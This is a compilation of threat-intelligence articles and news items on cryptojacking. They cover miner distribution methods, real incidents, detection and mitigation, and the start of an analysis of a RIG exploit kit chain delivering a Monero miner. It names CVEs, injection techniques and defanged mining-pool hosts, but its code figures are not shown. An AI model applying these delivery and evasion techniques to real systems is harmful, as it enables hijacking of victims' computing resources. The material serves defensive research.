In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking


FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.

Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools and

Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames













Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).

Figure 10: Cryptocurrency miner detection activity per month

Figure 11: Commonly observed pools and associated ports

Figure 12: Top 10 affected countries

Figure 13: Top five affected industries

Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.

Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.


In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

Move Over, Ransomware: Why Cybercriminals Are Shifting Their Focus to Cryptojacking

According to the 2018 IBM X-Force Threat Intelligence Index, the frequency and sophistication of malicious cryptocurrency mining, also called “cryptojacking,” has increased drastically in the past year. This mining is changing malicious actors’ priorities: While they had previously targeted companies’ data and financial assets, they are now seeking to extract value from organizations’ computing resources.

As a result, industries with powerful computers and relatively weak defenses — such as scientific research institutions and media companies — are suddenly caught in the crosshairs.

A Brief History of Cryptocurrency Mining

Cryptocurrency mining emerged when bitcoin, the first decentralized cryptocurrency, hit the scene in 2009. The process of mining cryptocurrency requires computationally intensive calculations to verify transactions, and miners are rewarded with cryptocurrency for this labor-intensive work. Since mining is a competitive process, it requires extensive computing power.

When bitcoin was first introduced, general-purpose central processing units (CPUs) could be used to mine it. But with each coin mined, the calculations required to mine the next coin become more complicated — demanding more computing power and more time to solve.

The mining applications that followed were developed to harness the power of graphics processing units (GPUs) to work more efficiently than mining with CPUs. GPUs are commonly used in enterprise settings, but they are also used for PC gaming, rendering graphics, scientific modeling and a variety of other complex tasks.

Today, bitcoin is mined with specialized application-specific integrated circuits (ASICs), which are optimized for the bitcoin algorithm, making general-purpose GPUs much less desirable for this purpose. However, bitcoin is no longer the only valuable cryptocurrency being mined.

New cryptocurrencies, such as Ethereum and Monero, are ASIC-resistant and better suited for mining by general-purpose computers. The creators of these cryptocurrencies worried about the centralization of bitcoin mining because of ASICs. Therefore, they created mining algorithms that harness memory capacity and speed. As a result, these new coins can be mined with general-purpose computers — triggering the rapid growth of mining malware across the globe.

The Difference Between Web- and Host-Based Mining Malware

Current mining malware can be divided into two major groups: web- and host-based malware.

Web-based mining malware is hosted on a website and activates when a user browses on an infected page. It is often written in JavaScript and executes as a web application on the local machine. This type of malware typically mines currencies like Monero, which is well-suited for mining via CPUs. Web-based miners are difficult to detect or stop because — while they don’t install themselves on local machines — they exploit local machines for their own purposes, unbeknownst to the users. Potential consequences of this type of attack include significant performance degradation, crashes and even overheating for mobile devices, according to ZDNet.

Host-based mining malware is a malicious application installed natively on the system, typically by a dropper-type Trojan. Often, the malware is just standard mining software running in a windowless mode in the background.

Other times, however, it’s more sophisticated. For example, the malware may use process-hollowing techniques to execute itself and then disguise the mining application’s process inside a legitimate system process — making it harder for users and antivirus solutions to identify and remove it. Host-based malware has better access to system resources, including the computer’s GPU, making it potentially much more lucrative for cybercriminals.

Additionally, the miner can schedule its activity for ideal times — so the user does not feel any performance impact — giving the cryptojacking better longevity on infected machines.

One example of host-based cryptojacking was reported in February 2017 when malicious actors breached a popular software download site to infect Apple product updates with mining malware, according to Help Net Security. Apple OSX computers are known for their high-end hardware, making them appealing targets for mining malware.

New Strategies Mean New Targets

Mining malware represents a relatively new threat to businesses. Unlike ransomware, it exploits hardware resources rather than the value of data. Businesses typically have large internal networks, which translates to heavy processing power.

As more companies move to cloud-based storage solutions, ransomware is becoming less effective at generating profit for criminals. Business owners with cloud storage can simply wipe their systems and restore their files from those backups. Attackers slinging mining malware aren’t interested in collecting ransom payments. As soon as a miner starts working, its operator can start raking in profits in the form of cryptocurrency.

Also, mining malware is much stealthier than ransomware because it doesn’t need to alert the user in any way. While ransomware notifies the user of its presence as a way to elicit payment, mining malware can run in the background for months — or even years — before discovery, especially if security professionals aren’t actively looking for it.

Since mining performance is determined by hardware performance, infecting high-end workstations and desktops is a priority for threat actors. This tactic is bad news for creative and scientific industries that use powerful computers to develop films, animations and games or conduct complex research. These types of organizations are also less likely to have invested in security and more likely to have awareness gaps.

What Can Companies Do to Limit the Threat of Cryptojacking?

Mining malware poses a serious threat to businesses across all sectors. Computers infected with host-based malware can be further infected with ransomware, spyware and other malicious applications. Organizations should educate their users and security leaders about the threat and take a proactive approach to detect it on enterprise endpoints.

Businesses should also invest in anti-malware programs to block known variants of mining malware and implement controls to identify mining activity. A security information and event management (SIEM) tool, for example, can alert security teams to high CPU and GPU usage during nonbusiness hours. Finally, behavioral analytics tools can help analysts identify abnormal patterns in resource usage with automation.

Interested in emerging security threats? Read the latest IBM X-Force Research

The post Move Over, Ransomware: Why Cybercriminals Are Shifting Their Focus to Cryptojacking appeared first on Security Intelligence.

League of Legends Philippines Attacked By CoinHive Monero Mining Malware

Cryptocurrency mining malware attacks are becoming increasingly common. Malware provides an easy way for the hackers to mine crypto without

League of Legends Philippines Attacked By CoinHive Monero Mining Malware on Latest Hacking News.

Smashing Security #086: Elon Musk submarine scams and 2FA bypass

Smashing Security #086: Elon Musk submarine scams and 2FA bypass

Crypto scamming Thai cave scoundrels! $25 million to make anti-fake news videos! TimeHop data breach! Phone number port out scams!

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by B J Mendelson.

Hola VPN Hack Targets MyEtherWallet Users

MyEtherWallet (MEW), a well-known cryptocurrency wallet interface, used Twitter to urge MEW customers who used Hola VPN within the last 24 hours, to transfer their funds immediately to a brand new account. They said they received a report that confirms the Hola VPN Chrome extension has been hacked. MEW’s Twitter account stated the attack was logging users’ activity including sensitive information such as usernames and passwords. The details of a currently unknown number of MEW users were exposed to hackers during a five-hour window on July 9th.

Hola VPN said in a blog post that upon learning about the incident, they immediately set up a response team of cybersecurity experts to investigate the incident and prevent it from happening again. They claim they immediately took emergency steps to replace the malicious extension causing the data leak. Regular MEW users were not affected by the data breach as the MEW service was not compromised, and the incident is known to be entirely out of MEW developers’ control. However, the breach certainly throws a shadow at the Israeli VPN service provider.

This is not the first time MEW users are being targeted. Earlier this year hackers managed to snatch more than $300,000 through execution of a sophisticated DNS hijacking attack. Many users lost their funds forever. Services such as MyEtherWallet do not operate like banks –  they do not charge transactions fees, they do not offer insurance, and they do not store cryptocurrency. Instead, they provide users with an interface that allows their clients to interact directly with the blockchain. Hugely unregulated and still in its wild west years, blockchain is like a vast, global, decentralized spreadsheet, and users are the only one responsible for the funds they store on such virtual wallet interfaces.

How to protect yourself?

First and foremost, use common sense and make sure that the sites you are visiting are legitimate. If you are a MEW user, your website needs to be Even if a single letter in the URL is changed, you are not in the correct place, and you are being phished.

Avoid opening websites that feel sketchy, or you do not trust – clicking on random links you see on social media may end up forwarding you to malicious sites. If you want to access a specific website, open a new tab on your browser and type the correct link manually. Navigating directly to the website decreases the chances of ending up on a phishing website.

Do not use the same password on other websites. One of the worst cybersecurity practices is to use the same password on multiple sites. If you struggle to remember your passwords, use tools that allow you to keep them safe and protected, or write them on a piece of paper. Make sure to change your passwords every three months – sometimes it takes years for companies to announce that they have been hacked.

Lastly, make sure that you have antivirus software installed on all your connected devices, and you deal with reliable VPN service providers. As in real life, cheap (or free) sometimes end up costing more. Quality VPNs encrypt your web traffic, do not allow hackers to monitor your online activity and do not let cybercriminals re-route your web traffic to phishing websites. Stay safe!

Download Panda FREE VPN

The post Hola VPN Hack Targets MyEtherWallet Users appeared first on Panda Security Mediacenter.

Does the Rise of Crypto-Mining Malware Mean the End of Ransomware?

Crypto-mining malware activity grew significantly in the first quarter of 2018, according to new research, suggesting that threat actors are finding this tactic to be more lucrative than traditional ransomware attacks due to the increasing popularity and value of digital currencies.

But this shift doesn’t signal an end to the threat of ransomware — rather, it points to an evolution toward more targeted attacks against specific organizations and industries, such as healthcare, that are most vulnerable and store particularly valuable data.

Cybercriminals Shift Tactics Amid Cryptocurrency Gold Rush

In short, this new trend shows that cybercriminals follow the money. Amid the rising popularity of cryptocurrencies like bitcoin, Monero and Etherium, threat actors have embraced crypto-mining schemes as a way to generate illicit financial gains with the least amount of effort, in the shortest time possible — and at a relatively low risk of discovery.

According to McAfee Labs Threats Report: June 2018, researchers observed more than 2.9 million samples of crypto-mining malware in the first quarter of 2018 — a 629 percent increase from just 400,000 samples in the last quarter of 2017.

“Cybercriminals will gravitate to criminal activity that maximizes their profit,” said Steve Grobman, chief technology officer (CTO) at McAfee, in a June 2018 press release. “With the rise in value of cryptocurrencies, the market forces are driving criminals to crypto-jacking and the theft of cryptocurrency. Cybercrime is a business, and market forces will continue to shape where adversaries focus their efforts.”

Troy Mursch, the security researcher behind the website Bad Packets Report, noted that the industry is seeing so many JavaScript-based crypto-miners because most modern browsers run JavaScript. This means that nearly every web user is a target of malicious crypto-jacking attacks.

Alternatively, attackers can maximize their computing power by infecting a server or other network asset with crypto-mining malware. This tactic makes enterprise networks particularly lucrative targets for crypto-jacking campaigns. Also, browser-based crypto-mining doesn’t require attackers to craft an exploit — and the action usually goes undetected so users might not know they’ve been infected for some time.

Why Ransomware Is Down but Not Out

These characteristics of crypto-mining could explain why some attackers have moved away from traditional ransomware. Victims also know when they’ve suffered a ransomware infection and can respond accordingly, which demotivates potential attackers.

But the fact that opportunistic attackers are leaving ransomware behind doesn’t mean the threat is over and done — it’s merely changing. For instance, threat intelligence provider Recorded Future noted that ransomware attack campaigns are becoming more targeted in nature. This is evident in ransomware actors’ penchant for going after healthcare, an industry in which resource deprivation can threaten people’s lives and trigger urgent responses. According to insurance company Beazley Group, healthcare targeting accounted for 45 percent of all ransomware attacks in 2017.

Attackers are also beginning to leverage the mere threat of high-profile ransomware to extract payment. Action Fraud, the U.K.’s cybercrime reporting center, detected one such scam campaign warning users that they had been infected with WannaCry. In actuality, the emails simply aimed to scare recipients into sending a bitcoin payment, limiting the necessity of even distributing malicious software to obtain its gains.

How Companies Can Defend Against Crypto-Mining Malware

Amid the growth of crypto-mining malware and the ongoing evolution of ransomware, enterprises can defend themselves against crypto-mining malware by investing in an endpoint security solution and creating a patch management program.

Because ransomware relies on suspicious emails and software vulnerabilities for distribution, users can guard against its primary attack vectors by following best security practices. Organizations can further defend themselves by regularly updating antivirus software and training employees to refrain from engaging fraudsters over email.

The post Does the Rise of Crypto-Mining Malware Mean the End of Ransomware? appeared first on Security Intelligence.

New Virus Decides If Your Computer Good for Mining or Ransomware

Security researchers have discovered an interesting piece of malware that infects systems with either a cryptocurrency miner or ransomware, depending upon their configurations to decide which of the two schemes could be more profitable. While ransomware is a type of malware that locks your computer and prevents you from accessing the encrypted data until you pay a ransom to get the decryption

CoinHive URL Shortener Abused to Secretly Mine Cryptocurrency Using Hacked Sites

Security researchers have been warning about a new malicious campaign that leverages an alternative scheme to mine cryptocurrencies without directly injecting the infamous CoinHive JavaScript into thousands of hacked websites. Coinhive is a popular browser-based service that offers website owners to embed JavaScript code that utilizes their website visitors' CPUs power in order to mine the

Kaspersky Deems Crypto-jacking the New Ransomware as Crypto-miners up Their Game

Because of its potential to earn hackers millions in a steady stream of cash, Kaspersky Labs has deemed crypto-jacking the new ransomware in a report that arrived  just as researchers spotted two new types of malware targeting the growing popularity of cryptocurrencies. In its report released last Wednesday, Kaspersky declared that crypto-mining...

Read the whole entry... »

Related Stories

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique


Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.

Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.

Figure 2: Injected iframe

The landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.

Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189 which allows it to download the payload and execute it using the code snippet seen in Figure 4.

Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.

Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419 which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.

Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.

Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.

Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.

Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.

Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.

Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

